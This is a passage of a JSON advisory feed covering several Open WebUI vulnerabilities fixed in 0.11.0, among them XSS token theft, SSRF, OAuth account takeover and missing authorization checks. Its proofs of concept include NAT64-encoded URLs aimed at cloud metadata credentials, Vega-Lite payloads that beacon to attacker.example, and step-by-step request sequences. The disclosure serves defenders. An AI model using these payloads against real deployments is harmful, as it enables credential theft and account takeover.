knowledge base, so the only thing that could have bound the two together was a membership check in the handler, and there was none. The explicit directory-delete endpoint in the same router already carried that check, which is what makes this a gap in one handler rather than a missing model-layer control.\n\n## Credits\nReported by @whyiug.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-08-04T20:35:47.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-jxc9-xmc4-gr23","https://github.com/open-webui/open-webui/pull/26722","https://github.com/open-webui/open-webui/commit/707efeaed7992dd9896d5928559458f228b9a539","https://github.com/open-webui/open-webui/releases/tag/v0.11.0","https://github.com/advisories/GHSA-jxc9-xmc4-gr23"],"source_kind":"github","identifiers":["GHSA-jxc9-xmc4-gr23","CVE-2026-70488"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-04T21:00:21.478Z","updated_at":"2026-09-03T03:00:45.099Z","epss_percentage":0.00213,"epss_percentile":0.11505,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qeGM5LXhtYzQtZ3IyM84ABhSx","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qeGM5LXhtYzQtZ3IyM84ABhSx","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.11.0","vulnerable_version_range":"\u003e= 0.9.6, \u003c= 0.10.2"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qeGM5LXhtYzQtZ3IyM84ABhSx/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zeHBmLXhxN3ItdjhjNc4ABhSw","url":"https://github.com/advisories/GHSA-3xpf-xq7r-v8c5","title":"Open WebUI: Same-origin XSS to account takeover via terminal file-preview iframe hardcoding allow-same-origin","description":"## Summary\nAny authenticated user with access to a terminal server could get script of their choosing to run in the Open WebUI origin itself. The HTML file preview rendered terminal-served files in an iframe whose sandbox always granted `allow-same-origin` alongside `allow-scripts`, and the file is served from a path on the application's own origin, so the sandbox provided no isolation at all. Script in a previewed file could read the victim's session token and take over the account.\n\n## Preconditions\n- At least one terminal server configured by an admin (`TERMINAL_SERVER_CONNECTIONS`, empty by default) and reachable by the victim. Deployments with no terminal server configured are not affected.\n- The attacker needs a normal authenticated account with access to that terminal server, no admin rights.\n- No victim interaction beyond having the chat open: a `display_file` tool call opens the preview automatically.\n- `TERMINAL_PROXY_HEADERS` unset, which is the default. An operator who had already set a restrictive Content-Security-Policy through it was not exposed, since those headers are merged into every proxied response including the served file.\n- The `iframeSandboxAllowSameOrigin` user setting is off by default, but the affected branch ignored it entirely.\n\n## Impact\nThe previewed document runs in the application origin, so it can reach the parent window, read the session token out of `localStorage` and exfiltrate it, which is full account takeover of the victim. If the victim is an admin, or any user holding `workspace.functions`, that takeover extends to server-side code execution through Functions. Getting the malicious file written and displayed still requires a prompt-injection or a social step, which is what keeps the complexity high rather than trivial. Instances with no terminal server configured were never affected, and neither was the `srcdoc` preview path.\n\n## Fix\nFixed in 0.11.0 by 65a5fad7b (#26907). The `serveUrl` preview branch now gates `allow-same-origin` behind the same `iframeSandboxAllowSameOrigin` setting the `srcdoc` branch already used, so by default the preview loads at an opaque origin and cannot reach the parent context. Upgrading is sufficient, no configuration change is required, and HTML previews continue to render normally.\n\n## Root cause\n- `src/lib/components/chat/FileNav/FilePreview.svelte`, the `serveUrl` iframe branch, reached for HTML files served through `/api/v1/terminals/{id}/files/serve/...`.\n- Present from 0.9.0, where that branch was introduced, through 0.10.2.\n\nThe component grew two preview paths. The `srcdoc` path was hardened: same-origin became opt-in and a CSP was injected into the document. The `serveUrl` path, added later for files streamed from a terminal server, kept a static sandbox string with `allow-same-origin` baked into it. Because the terminal proxy is mounted under the application's own origin and forwards the upstream response without adding a Content-Security-Policy of its own unless the operator configured one, and no global CSP is set, the sandbox was the only isolation boundary left, and it was granting precisely the permission that dissolved it.\n\n## Proof of concept\nWrite an HTML file containing a script that reads `window.parent.localStorage.token` to a terminal server the victim can reach, then trigger `display_file` for that file. The chat handler opens the preview on the resulting `terminal:display_file` event with no click, the script executes at the application origin, and the token is exfiltrated.\n\n## Credits\nReported by @manus-use (researcher zx / Jace).","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-08-04T20:02:03.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.2,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-3xpf-xq7r-v8c5","https://github.com/open-webui/open-webui/pull/26907","https://github.com/open-webui/open-webui/commit/65a5fad7b97db99d490d81f4e0860282c3a4543c","https://github.com/open-webui/open-webui/releases/tag/v0.11.0","https://github.com/advisories/GHSA-3xpf-xq7r-v8c5"],"source_kind":"github","identifiers":["GHSA-3xpf-xq7r-v8c5","CVE-2026-70486"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-04T21:00:21.479Z","updated_at":"2026-09-03T03:00:45.100Z","epss_percentage":0.00374,"epss_percentile":0.30157,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zeHBmLXhxN3ItdjhjNc4ABhSw","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zeHBmLXhxN3ItdjhjNc4ABhSw","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.11.0","vulnerable_version_range":"\u003e= 0.9.0, \u003c= 0.10.2"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zeHBmLXhxN3ItdjhjNc4ABhSw/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04eDV2LWNwdjctOGpqcM4ABhSv","url":"https://github.com/advisories/GHSA-8x5v-cpv7-8jjp","title":"Open WebUI: Any authenticated user can reach internal services and cloud metadata via NAT64-encoded URLs","description":"## Summary\n\nOpen WebUI fetches user-supplied URLs on the server for RAG URL ingestion, URL-to-markdown conversion and web-search content retrieval, and decides whether a destination is allowed by asking whether its IP address is globally routable. That test operates on the literal IPv6 address and does not look at the IPv4 address embedded inside it. On a deployment whose network has a NAT64 gateway, any verified user can wrap an internal or cloud-metadata IPv4 address in the NAT64 well-known prefix, pass the filter, and receive the internal response body back through the API.\n\n## Preconditions\n\n- Any verified (authenticated) user account. No admin role, no elevated permission.\n- Default configuration: `ENABLE_LOCAL_WEB_FETCH` off, the default `WEB_FETCH_FILTER_LIST` metadata blocklist in place. Neither prevents this, because the blocklist matches hostname strings and the NAT64 literal is not one of them.\n- The deployment's network must provide NAT64 translation for the well-known `64:ff9b::/96` prefix, which is the common default on IPv6-only and dual-stack cloud and Kubernetes networks.\n- Deployments on IPv4-only networks, or on any network without a NAT64 gateway, are not affected: the address has nowhere to route.\n\n## Impact\n\nOn an affected network a low-privilege user can read GET responses from services the server can reach but the internet cannot: cloud instance metadata including IAM role credentials, loopback-bound admin surfaces, and internal APIs in the same VPC or cluster. The response body is returned to the caller, so this is full-read, not blind. Exploitation is not universal, it depends entirely on the deployment's network providing NAT64 translation, which is why the score carries high attack complexity. Deployments without NAT64 lose nothing here.\n\n## Fix\n\nFixed in v0.11.0 by commit `1717b493d`. Address classification now unwraps the IPv4 embedded in IPv6 transition encodings before deciding whether a destination is global, and applies that at all three checkpoints. NAT64-wrapped public destinations continue to work. Upgrading to v0.11.0 fully resolves the issue with no configuration change.\n\n## Root cause\n\n- `backend/open_webui/retrieval/web/utils.py` — `validate_url()`, the pre-fetch check on the submitted URL.\n- `backend/open_webui/retrieval/web/utils.py` — `_ssrf_safe_new_conn()` and `_SSRFSafeResolver`, the connect-time re-checks that defeat DNS rebinding.\n\nAll three decided reachability from `ipaddress.ip_address(ip).is_global` applied to the literal address. That predicate answers whether an IPv6 address sits in globally-routable space, which is a different question from where the packet actually ends up once a transition gateway translates it. The NAT64 well-known prefix is by design a global prefix carrying an arbitrary IPv4 destination, so an internal target wrapped in it satisfies the check while reaching exactly what the check exists to prevent. Because the same predicate backed the connect-time re-checks, no later layer caught it either. The fix inspects every standardized transition encoding rather than only the NAT64 prefix, since the same reasoning error applies to each of them.\n\n## Proof of concept\n\nAgainst the real `POST /api/v1/retrieval/process/web` flow on v0.10.2 as an authenticated user, with internal HTTP services returning a marker string. The plain forms are rejected with HTTP 400:\n\n```\nhttp://169.254.169.254/latest/meta-data/          -\u003e 400\nhttp://127.0.0.1/                                 -\u003e 400\nhttp://[::ffff:169.254.169.254]/                  -\u003e 400\nhttp://metadata.google.internal/                  -\u003e 400\n```\n\nThe NAT64 encodings of the same targets are accepted, and the response body is returned in the `content` field:\n\n```\nhttp://[64:ff9b::a9fe:a9fe]/latest/meta-data/iam/security-credentials/   -\u003e 200, marker returned\nhttp://[64:ff9b::7f00:1]/admin/internal-status                          -\u003e 200, marker returned\n```\n\nNAT64 translation was modelled by binding the translated addresses locally rather than by routing through a real NAT64 gateway; everything else, including the request flow and the validation code, is the unmodified v0.10.2 path. After the fix both URLs return 400 while `http://[64:ff9b::808:808]/` (8.8.8.8, public) still returns 200, confirming no over-blocking.\n\n## Credits\n\n- tonghuaroot — reported the transition-form gap in the address classification and supplied the fix approach.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-08-04T19:59:36.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-8x5v-cpv7-8jjp","https://github.com/open-webui/open-webui/commit/1717b493d83c86afa82aa8bc50139250852dd2f3","https://github.com/open-webui/open-webui/releases/tag/v0.11.0","https://github.com/advisories/GHSA-8x5v-cpv7-8jjp"],"source_kind":"github","identifiers":["GHSA-8x5v-cpv7-8jjp","CVE-2026-70485"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-04T20:00:22.486Z","updated_at":"2026-09-03T03:00:45.100Z","epss_percentage":0.00222,"epss_percentile":0.12887,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04eDV2LWNwdjctOGpqcM4ABhSv","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04eDV2LWNwdjctOGpqcM4ABhSv","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.11.0","vulnerable_version_range":"\u003e= 0.9.0, \u003c 0.11.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04eDV2LWNwdjctOGpqcM4ABhSv/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1nNDIzLWdyZjctOThyds4ABhSu","url":"https://github.com/advisories/GHSA-g423-grf7-98rv","title":"Open WebUI: Users denied the image-generation permission can still generate images via chat completions","description":"## Summary\nAn authenticated user whose `features.image_generation` permission has been revoked can still make the server generate images by sending the feature flag in a chat-completion request. The chat pipeline took the client-supplied `features` object at face value and never re-checked the permission that the direct image routes enforce, so the denial applied to the UI affordance but not to the server-side generation path.\n\n## Preconditions\nImage generation must be enabled and a provider configured by the administrator (`ENABLE_IMAGE_GENERATION` is off by default). The per-user permission defaults to granted, so only deployments where an administrator explicitly revoked it for some users are affected. On 0.10.0 and later the caller must also set `params.function_calling` to `legacy`; on 0.9.x and earlier the legacy mode was the default, so no special parameter was needed. Deployments on native function calling are unaffected, since that path checks the permission before registering the image tools.\n\n## Impact\nA user the administrator has explicitly denied image generation can consume the operator's configured provider through the chat API, spending the operator's API credits and provider quota and writing generated files to the operator's storage. Where an image is present in the conversation and image editing is enabled, the same handler reaches the image-edit provider as well. No provider credentials are exposed, and no other user's data is reachable.\n\n## Fix\nFixed in 897d69a (#26703). The legacy chat-features block now re-checks `features.image_generation` against the caller's permissions before invoking the image handler, matching the check the direct image routes and the native function-calling path already performed.\n\n## Root cause\nThe chat-completions endpoint stored the request's `features` object into request metadata, and `process_chat_payload` in the chat middleware dispatched to the image handler purely on the truthiness of that client-supplied flag. Permission enforcement lived on the two surfaces that were reached from the UI, the direct `/images/generations` and `/images/edit` routes and the native function-calling tool registration, and was simply absent on the legacy chat path. The flag was treated as a statement of user intent, which it is, rather than as an authorization decision, which the handler behind it made it.\n\n## Credits\n@DavidCarliez, for identifying that the chat pipeline honours the client-supplied image-generation feature flag without re-checking the permission.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-08-04T19:56:57.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-g423-grf7-98rv","https://github.com/open-webui/open-webui/pull/26703","https://github.com/open-webui/open-webui/commit/897d69a35c65f8ab54583bb9ca8dc74eab7bcd29","https://github.com/open-webui/open-webui/releases/tag/v0.11.0","https://github.com/advisories/GHSA-g423-grf7-98rv"],"source_kind":"github","identifiers":["GHSA-g423-grf7-98rv","CVE-2026-70484"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-04T20:00:22.486Z","updated_at":"2026-09-03T03:00:45.101Z","epss_percentage":0.00267,"epss_percentile":0.18515,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nNDIzLWdyZjctOThyds4ABhSu","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1nNDIzLWdyZjctOThyds4ABhSu","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.11.0","vulnerable_version_range":"\u003e= 0.7.0, \u003c 0.11.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nNDIzLWdyZjctOThyds4ABhSu/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1yZmZtLTlxNTctcTY0Oc4ABhSt","url":"https://github.com/advisories/GHSA-rffm-9q57-q649","title":"Open WebUI: Client-side SSRF via unrestricted external resource loading in Vega/Vega-Lite chart rendering","description":"## Summary\nOpen WebUI renders `vega` and `vega-lite` fenced code blocks in chat content by building a Vega view in the viewer's browser without a restricted resource loader. Any user who can place such a block where another user will see it can make that user's browser issue attacker-chosen outbound GET requests, and read back responses from same-origin or CORS-permissive targets into the rendered page. Because the request comes from the browser, server-side SSRF protections never see it.\n\n## Preconditions\nDefault configuration, no flags or environment variables involved: Vega blocks render unconditionally wherever chat content is displayed. The attacker needs an account that can put content in front of the victim, which covers a shared chat, a channel message, and model, RAG or tool output the attacker can influence. The victim must open the message, so this is not zero-click. Deployments where the victim's browser has no network position of interest lose little.\n\n## Impact\nThe victim's browser becomes a request proxy into whatever it can reach: internal hosts and ports behind the perimeter, same-site endpoints, and out-of-band beacons that confirm a chart was viewed and by whom. Where the target is same-origin or returns permissive CORS headers, the response body is pulled back into the chart in the victim's page, which turns the request into a read. Requests are GET only, and no server-side data is exposed to the attacker directly.\n\n## Fix\nFixed in 5278eb906 (#26806), released in 0.11.0. The view is now constructed with a loader whose `load` always throws and whose `sanitize` resolves the URI with the browser's own URL parser and permits only `data:` and same-origin results, so charts can only use inline `data.values`. Upgrading is sufficient; no configuration change is needed.\n\n## Root cause\n- `src/lib/utils/index.ts` — `renderVegaVisualization`\n- `src/lib/components/chat/Messages/CodeBlock.svelte` — renders `vega`/`vega-lite` blocks\n\nThe renderer treated a chart spec as trusted authored content rather than as untrusted chat text, so it accepted Vega's default loader. That loader has two separate ways out of the page: `data.url` and topojson/geo sources are fetched at view construction, and image marks pass their `url` through `sanitize` and are written into the output SVG as `\u003cimage href\u003e`, which the browser fetches when the chart is displayed. The second path survives downstream SVG sanitization because the URL is a legitimate attribute value, not markup.\n\n## Proof of concept\nPost either block into a chat, channel message, or shared chat that the victim will open. Neither requires the victim to interact beyond viewing.\n\n```vega-lite\n{\"$schema\":\"https://vega.github.io/schema/vega-lite/v5.json\",\"data\":{\"url\":\"http://attacker.example/probe?a=1\"},\"mark\":\"point\"}\n```\n\n```vega-lite\n{\"$schema\":\"https://vega.github.io/schema/vega-lite/v5.json\",\"data\":{\"values\":[{\"x\":1}]},\"mark\":{\"type\":\"image\",\"url\":\"http://attacker.example/beacon.png\"},\"encoding\":{\"x\":{\"field\":\"x\"}}}\n```\n\nThe first fires at view construction; the second fires when the rendered SVG is displayed. Both are visible as outbound requests in the victim's network log and in the attacker's listener. After the fix neither request is made and inline `data.values` charts still render.\n\n## Credits\n- @Zureno — reported the issue and the `data.url` path.\n- @Classic298 — identified the image-mark sink and authored the fix.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-08-04T19:54:57.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-rffm-9q57-q649","https://github.com/open-webui/open-webui/pull/26806","https://github.com/open-webui/open-webui/commit/5278eb906ebecefc6538a19bc86df09d997e43e6","https://github.com/open-webui/open-webui/releases/tag/v0.11.0","https://github.com/advisories/GHSA-rffm-9q57-q649"],"source_kind":"github","identifiers":["GHSA-rffm-9q57-q649","CVE-2026-70480"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-04T20:00:22.486Z","updated_at":"2026-09-03T03:00:45.102Z","epss_percentage":0.00192,"epss_percentile":0.09095,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yZmZtLTlxNTctcTY0Oc4ABhSt","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1yZmZtLTlxNTctcTY0Oc4ABhSt","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.11.0","vulnerable_version_range":"\u003e= 0.6.34, \u003c 0.11.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yZmZtLTlxNTctcTY0Oc4ABhSt/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zdmY2LTY0dnItM2c1Ns4ABhSs","url":"https://github.com/advisories/GHSA-3vf6-64vr-3g56","title":"Open WebUI: Any authenticated user can cancel another user's chat generation via the chat delete endpoint","description":"## Summary\n`DELETE /api/v1/chats/{id}` cancelled a chat's in-flight tasks before it checked whether the caller was allowed to delete that chat. Any authenticated user who knew another user's chat id could therefore abort that user's running model response, title generation or tag generation. The deletion itself was still refused, so the only missing control was on the cancellation side effect.\n\n## Preconditions\nDefault configuration, no special deployment shape. The attacker needs a normal account with the default `user` role and nothing else: the `chat.delete` permission is not required, and revoking it does not prevent the cancellation. The attacker also needs the victim's chat id, which is returned by the read-only shared-chat endpoint when a chat or a folder has been shared with them - otherwise enumerating the chat id requires guessing the chat id or brute forcing it, and the victim must have a generation running at that moment.\n\n## Impact\nA user can repeatedly interrupt another user's generations without any write access to the target chat. Nothing is deleted, modified or disclosed, and the victim can simply regenerate, so the effect is limited to availability of in-flight responses. Because the attacker only needs a chat id, the interruption can be scripted and repeated for as long as the id stays valid.\n\n## Fix\nFixed in https://github.com/open-webui/open-webui/pull/27006, released in 0.11.0. The handler now resolves and authorizes the chat first and only cancels tasks and deletes once the caller is an admin or a permitted owner; an unauthorized caller gets 401 or 404 with no cancellation.\n\n## Root cause\nAffected component: `delete_chat_by_id` in `backend/open_webui/routers/chats.py`, serving `DELETE /api/v1/chats/{id}`. Affected setup: every build from 0.9.6 up to and including 0.10.2.\n\nThe cancellation was written as a cleanup step for the delete that follows it, and it was placed at the top of the handler so that it would run before the chat row disappeared. That put an unauthenticated-by-ownership side effect ahead of every check in the function: the admin branch, the `chat.delete` permission check, and the owner lookup all ran afterwards, so their outcome could no longer affect whether the tasks were stopped. The dedicated task-stop endpoint already verified ownership before calling the same helper, so the intended ordering existed elsewhere in the codebase.\n\n## Proof of concept\nAgainst a 0.10.2 instance with two accounts, a victim admin and an attacker holding the default `user` role, and an upstream that streams slowly:\n\n1. As the victim, start a generation in a chat and confirm `GET /api/tasks/chat/{chat_id}` reports one active task.\n2. As the attacker, confirm `GET /api/v1/chats/{chat_id}` returns 401, then send `DELETE /api/v1/chats/{chat_id}`.\n3. The delete is refused with 404, the chat still exists, but the victim's task list is now empty and the assistant message is marked done mid-generation. A control run without step 2 keeps generating.\n\nRepeating step 2 with the `chat.delete` permission revoked for the `user` role returns 401 and still cancels the task. The same sequence against 0.11.0 leaves the task running.\n\n## Credits\n@GabrielGomesAL, who reported the missing authorization on the chat delete endpoint.","origin":"UNSPECIFIED","severity":"LOW","published_at":"2026-08-04T19:54:49.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-3vf6-64vr-3g56","https://github.com/open-webui/open-webui/pull/27006","https://github.com/open-webui/open-webui/commit/4f93c3e36c1734342a32c312bdb0516c66d8e93c","https://github.com/open-webui/open-webui/releases/tag/v0.11.0","https://github.com/advisories/GHSA-3vf6-64vr-3g56"],"source_kind":"github","identifiers":["GHSA-3vf6-64vr-3g56","CVE-2026-70483"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-04T20:00:22.486Z","updated_at":"2026-09-03T03:00:45.103Z","epss_percentage":0.00244,"epss_percentile":0.1536,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zdmY2LTY0dnItM2c1Ns4ABhSs","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zdmY2LTY0dnItM2c1Ns4ABhSs","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.11.0","vulnerable_version_range":"\u003e= 0.9.6, \u003c 0.11.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zdmY2LTY0dnItM2c1Ns4ABhSs/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1ycTg0LXA2cnItdmY4Oc4ABhSr","url":"https://github.com/advisories/GHSA-rq84-p6rr-vf89","title":"Open WebUI: Account takeover via OAuth token exchange accepting tokens issued to any client","description":"## Summary\n\nThe OAuth token exchange endpoint accepts a raw provider access token and validates it by calling the provider's userinfo endpoint. A userinfo endpoint reports only that a token is valid, never which OAuth client it was issued to, and the endpoint performed no audience or client check of its own. Anyone holding an access token minted for any client registered with the same provider could exchange it for an Open WebUI session as that token's user, including applications the operator does not control and has never authorised.\n\n## Preconditions\n\n- `ENABLE_OAUTH_TOKEN_EXCHANGE=True`. Disabled by default, so a stock deployment is not affected.\n- The victim already has an Open WebUI account. The endpoint does not create users.\n- The attacker can obtain a provider access token for the victim, typically by having them sign in to an unrelated OAuth application on the same provider. On public providers, registering that application is self-service.\n- The subject identifier the attacker's client observes matches the one stored on the victim's account. Google, GitHub, Okta and self-hosted OIDC servers in default configuration issue a subject that is stable across all clients and are directly affected. Microsoft Entra ID issues per-application subjects, so the match fails there unless `OAUTH_MERGE_ACCOUNTS_BY_EMAIL` is enabled or `OAUTH_SUB_CLAIM` points at a globally stable claim such as `oid`.\n- `OAUTH_ALLOWED_DOMAINS` is enforced on this endpoint but does not constrain the attack, because the impersonated user is a legitimate member of an allowed domain.\n\n## Impact\n\nFull account takeover of any user whose provider access token the attacker can obtain. The endpoint applies no role gating, so the issued session carries the target account's role, and a targeted administrator yields an administrator session. The victim never interacts with Open WebUI and has no opportunity to notice.\n\nThe standard OAuth callback is not affected. It obtains its token through an authorization-code exchange authenticated with the client secret, so the token is inherently bound to Open WebUI's own client, and the ID token's audience is validated.\n\n## Fix\n\nFixed in 0.11.0. The endpoint now resolves which OAuth client a presented token was issued to through RFC 7662 token introspection, and rejects tokens minted for any client not named in `OAUTH_TOKEN_EXCHANGE_TRUSTED_CLIENT_IDS`. Only the introspected `client_id` is honoured; the `aud` field is ignored, because it names intended resource servers rather than the issuing client and several providers let any client place another client's identifier there.\n\n**Upgrading alone is not sufficient.** The check is opt-in: with `OAUTH_TOKEN_EXCHANGE_TRUSTED_CLIENT_IDS` unset the endpoint behaves as it did before, so any deployment running with `ENABLE_OAUTH_TOKEN_EXCHANGE=True` must also set that list. It is a deploy-time environment variable and cannot be changed from the admin interface, so a compromised administrator session cannot widen the trust boundary at runtime.\n\nProviders that do not implement RFC 7662 introspection, including Google, Microsoft Entra ID, GitHub and Feishu, cannot be restricted this way at all. **On those, token exchange has no safe configuration and should be left disabled.**\n\n## Root cause\n\n- `backend/open_webui/routers/auths.py`, `token_exchange` (`POST /api/v1/auths/oauth/{provider}/token/exchange`)\n\nToken exchange skips the authorization-code step entirely and trusts a token supplied by the caller. The only validation performed was a userinfo lookup, which answers whether a token is valid rather than who issued it, so the endpoint had no way to distinguish a token minted for Open WebUI from one minted for an unrelated application.\n\n## Proof of concept\n\nReproduced against a mock OIDC provider serving two tokens for the same end user, minted for two different clients, with `OAUTH_ALLOWED_DOMAINS=corp.example` actively enforced.\n\n| Case | Token | Result |\n| --- | --- | --- |\n| Control | not recognised by the provider | 400 rejected |\n| Outsider's own account, non-allowed domain | minted for `attacker-evil-app` | 403 blocked by domain allowlist |\n| Victim's account, foreign client | minted for `attacker-evil-app` | 200, session issued for `victim@corp.example` |\n\nThe issued session token was confirmed usable: `GET /api/v1/auths/` returned 200 authenticated as the victim. The provider log recorded the token as minted for `client_id='attacker-evil-app'`, while Open WebUI's own client is `openwebui-client-id`.\n\n## Credits\n\nReported by @Classic298.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-08-04T19:52:01.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-rq84-p6rr-vf89","https://github.com/open-webui/open-webui/commit/b190dcf3caa00dc8b7b9c7312828298d9143f60d","https://github.com/open-webui/open-webui/commit/c4332be71e6e9c314e8a13b9d2819a6932561630","https://github.com/open-webui/open-webui/releases/tag/v0.11.0","https://github.com/advisories/GHSA-rq84-p6rr-vf89"],"source_kind":"github","identifiers":["GHSA-rq84-p6rr-vf89","CVE-2026-70482"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-08-04T20:00:22.486Z","updated_at":"2026-09-03T03:00:45.103Z","epss_percentage":0.00338,"epss_percentile":0.26514,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ycTg0LXA2cnItdmY4Oc4ABhSr","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1ycTg0LXA2cnItdmY4Oc4ABhSr","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.11.0","vulnerable_version_range":"\u003e= 0.8.0, \u003c 0.11.0"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ycTg0LXA2cnItdmY4Oc4ABhSr/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tajVyLWpmNDktbTN3N84ABhSq","url":"https://github.com/advisories/GHSA-mj5r-jf49-m3w7","title":"Open WebUI: Any member with write access to a standard channel can edit or delete other members' messages","description":"## Summary\nOn standard channels, the message update and delete handlers accepted any caller holding write access on the channel, without checking that the caller wrote the message. Write access is the same grant a member needs in order to post, so every ordinary participant in a shared channel could rewrite or permanently delete any other participant's messages. The group and direct message branch of the same handlers enforced authorship; the standard branch did not.\n\n## Preconditions\nChannels are disabled by default and must be enabled by an administrator (`ENABLE_CHANNELS`). The channel must be a standard channel; group and direct message channels are not affected. The attacker is any authenticated account with role `user` that holds write access on the channel, whether granted publicly, per user, or through a group. No ownership of the channel, channel manager role, or elevated role is required. Channel and message ids are returned by the listing endpoints the member can already call.\n\n## Impact\nAn ordinary member could replace the content of another member's message while the message stayed attributed to its original author, and could attach arbitrary `data` and `meta` payloads to it through the same form. The member could also permanently delete other members' messages, up to the entire visible history of the channel. This is an integrity and availability loss against other users of the channel: content can be forged under a colleague's name and records can be destroyed. It reaches no further than channels the attacker already has write access to, and it discloses nothing the attacker could not already read as a member. Pinning is unaffected and is not part of this issue.\n\n## Fix\nFixed in `c609ec411` (#27197), released in 0.11.0. Both handlers now apply the same authorship check the group and direct message branch already used, so a non-admin caller can act only on their own messages regardless of write access. Upgrading fully resolves it, with no configuration change required.\n\n## Root cause\nAffected components:\n- `backend/open_webui/routers/channels.py`, `update_message_by_id` (`POST /api/v1/channels/{id}/messages/{message_id}/update`)\n- `backend/open_webui/routers/channels.py`, `delete_message_by_id` (`DELETE /api/v1/channels/{id}/messages/{message_id}/delete`)\n\nBoth handlers branch on channel type, and the two branches asked different questions. The group and direct message branch asked whether the caller wrote the message. The standard branch asked whether the caller is allowed to write in the channel, which is a permission level, not an identity. Those are not interchangeable: posting a message runs that same write check, so the grant that lets a member participate was silently accepted as the grant to rewrite and remove everyone else's content, and every ordinary participant satisfied it. The model layer looks messages up by primary key alone, so the router branch was the only authorization that ran.\n\n## Proof of concept\nReported with a script that runs end to end against a live instance. An administrator seeds the accounts and a standard channel granting read and write; everything after that is performed by a separate plain `user` account in no group that owns neither the channel nor any 